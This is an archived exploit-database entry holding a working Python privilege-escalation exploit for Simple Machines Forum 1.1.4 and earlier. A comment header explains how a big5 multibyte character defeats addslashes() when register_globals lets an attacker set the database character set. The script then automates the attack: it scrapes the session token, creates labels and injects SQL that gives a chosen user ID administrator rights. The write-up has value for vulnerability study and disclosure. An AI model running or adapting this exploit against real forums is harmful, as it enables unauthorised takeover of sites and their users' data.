Simple Machines Forum (SMF) 1.1.4 - SQL Injection

EDB-ID:

5826




Platform:

PHP

Date:

2008-06-15


#!/usr/bin/python
"""
#=================================================================================================#
#                     ____            __________         __             ____  __                  #
#                    /_   | ____     |__\_____  \  _____/  |_          /_   |/  |_                #
#                     |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\               #
#                     |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |                 #
#                     |___|___|  /\__|  /______  /\___  >__|            |___||__|                 #
#                              \/\______|      \/     \/                                          #
#=================================================================================================#
#                                     This was a priv8 Exploit                                    #
#=================================================================================================#
#  	           		    Simple Machines Forum <= 1.1.4                                #
#    		                      Sql Injection Vulnerability    			          #
#                                    Priviledge Escalation Exploit              		  #
#====================================#===========#====================================#===========#
# Server Configuration Requirements  #           # Some Information                   #           #
#====================================#		 #====================================#           #
#                                                #                                                #
# register_globals = 1                           #  Vendor:   www.simplemachines.org              #
#                                                #  Author:   The:Paradox                         #
#================================================#  Severity: N/A		                  #
# 						 #						  #
# You may find exploits updates and more 	 #						  #
# explanations on =>				 #  Proud To Be Italian.                          #
# 	    	http://paradox.altervista.org 	 #  	                 			  #
#                                                #                                                #
#====================================#===========#================================================#
# Board Description		     #								  #
#====================================#								  #
#												  #
# Simple Machines Forum - SMF in short - is a free, professional grade software package that 	  #
# allows you to set up your own online community within minutes.				  #
# Its powerful custom made template engine puts you in full control of the lay-out of your	  #
# message board and with our unique SSI - or Server Side Includes - function you can let your     #
# forum and your website interact with each other.						  #
# SMF is written in the popular language PHP and uses a MySQL database. It is designed to provide #
# you with all the features you need from a bulletin board while having an absolute minimal	  #
# impact on the resources of the server. 							  #
# SMF is the next generation of forum software - and best of all it is and will always 		  #
# remain completely free! 									  #
#												  #
#====================================#============================================================#
# Proof Of Concept / Bug Explanation #                                                            #
#====================================#                                                            #
# This is a quite old exploit and it is inapplicable on 1.1.5 version and on last 2.0 pre-release #
# (that's why I decided to public it). First, let's have a little poc.				  #
#=================================================================================================#

[Load.php]

148.	if (isset($db_character_set) && preg_match('~^\w+$~', $db_character_set) === 1)
149.		db_query("
150.			SET NAMES $db_character_set", __FILE__, __LINE__);


#=================================================================================================#
# In Load.php if $db_character_set is set Smf will execute a Set Names Sql Query.      		  #
# Directly from dev.mysql.com let's see what it means.						  #
#												  #
# "SET NAMES indicates what character set the client will use to send SQL statements to the       #
# the server. Thus, SET NAMES 'cp1251' tells the server future incoming messages from this client #
# are in character set cp1251."									  #
#												  #
# Ok, now let's see what $db_character_set is.							  #
# $db_character_set is a "Settings.php variable" written only if a "Non-Default tick"	          #
# is checked during the installation process.							  #
# The real vulnerability is when the "Non-Default tick" is left unchecked, Smf doesn't write      #
# it in "Settings.php" and no value is assigned to it: it's possible to set it 			  #
# via register_globals.										  #
# 												  #
# Now the cool poc section =D 									  #
# Surely you saw that preg_match avoids any injection of non-alphanumerical chars in the query    #
# at line 150 in Load.php 	  								  #
# So, how is possible to take advantage of that?						  #
# To understand this vulnerability you have to comprehend some character set presents multibyte	  #
# characters and they may obiate addslashes() function.		  	  			  #
# Addslashes simply adds a backslash (0x5c) before single quote ('), double quote ("), 		  #
# backslash (\) and NUL (the NULL byte), without checking if the added blackslash creates 	  #
# another char.											  #
# No, i'm not going mad :P Here is an example:							  #
#												  #
# 	   				    Bytes in Input 					  #
#	      				        0xa327						  #
#												  #
#      				       Addslashes(Bytes in Input)				  #
#    	     				       0xa35c27						  #
# 												  #
# In big5, but also in other multibyte charsets, 0xa35c is a valid char: 0x27 (') is left alone.  #
# Therefore a lot of smf's queries are vulnerable if $db_character_set is settable.		  #
# In this exploit i will inject sql code in Update syntax, increasing user's privledges.	  #
#=================================================================================================#
# Exploit tested on 1.1.3 and 1.1.4 Smf's versions. 						  #
#=================================================================================================#
# Use this exploit at your own risk. You are responsible for your own deeds.                      #
#=================================================================================================#
#                                      Python Exploit Starts                                      #
#=================================================================================================#
"""
from sys import argv, exit
from httplib import HTTPConnection
from urllib import urlencode, unquote
from time import sleep
print """
#=================================================================#
#  	           Simple Machines Forum <= 1.1.4                 #
#                    Sql Injection Vulnerability                  #
#                   Priviledge Escalation Exploit                 #
#                                                                 #
#               ######################################            #
#               #  Let's get administrator rights!!! #            #
#               ######################################            #
#                                                                 #
#                     Discovered By The:Paradox                   #
#                                                                 #
# Usage:                                                          #
#  ./Exploit [Target] [Path] [PHPSessID] [Userid]                 #
#                                                                 #
# Example:                                                        #
#  ./Exploit 127.0.0.1 /SMF/ a574bfe34d95074dea69c00e38851722 9   #
#  ./Exploit www.host.com / 11efb3b6031bc79a8dd7526750c42119 36   #
#=================================================================#
""" 

if len(argv)<=4: exit()


sn = "PHPSESSID" # Session cookie name. You may have to change this.
port = 80

target = argv[1]
path = argv[2]
sv = argv[3]
uid = argv[4]


class killsmf:
	
	def __init__(self):
		
		print "[.] Exploit Starts."
	
		self.GetSesc()
		self.CreateLabels()
		self.Inject() 
	
		print "[+] All done.\n Now user with ID_MEMBER " + uid + " should have administrator rights. \n -= Paradox Got This One =-"
	
	def GetSesc(self):
		
		print "[+] Trying to read Sesc"	
	
		for i in range (0,2): 
				conn = HTTPConnection(target,port)
				conn.request("GET", path + "index.php?action=pm;sa=manlabels;", {}, {"Accept": "text/plain","Cookie": sn + "=" + sv + ";"})
				rsp = conn.getresponse()
				r = rsp.read()

		if rsp.status == 404: 
				exit ("[-] Error 404. Not Found")
		elif r.find('<input type="hidden" name="sc" value="') != -1 and r.find('" />') != -1 : 
				self.sesc = r.split('<input type="hidden" name="sc" value="')[1].split('" />')[0] 
				if len(self.sesc) != 32: exit ("[-] Invalid Sesc")
				print "[+] Sesc has been successfully read ==> "+self.sesc 
		else: 
				exit ("[-] Unable to find Sesc")

	def CreateLabels(self):
		print "[+] Creating three labels..."
		for i in range (0,3): 
				conn = HTTPConnection(target,port)
				conn.request("POST", path + "index.php?action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label" : i, "add" : "Add+New+Label"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + ";"})
				sleep(0.35)
	def Inject(self):
		print "[+] Sql code is going to be injected."
		conn = HTTPConnection(target,port)
		conn.request("POST", path + "index.php?debug;action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label_name[0]" : "o rly" + unquote("%a3%27"),"label_name[1]" : "ID_GROUP=1 WHERE/*", "label_name[2]" : "*/ID_MEMBER=" + uid + "/*", "save" : "Save", "sc" : self.sesc, "db_character_set": "big5"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + ";"})

killsmf()	

# milw0rm.com [2008-06-15]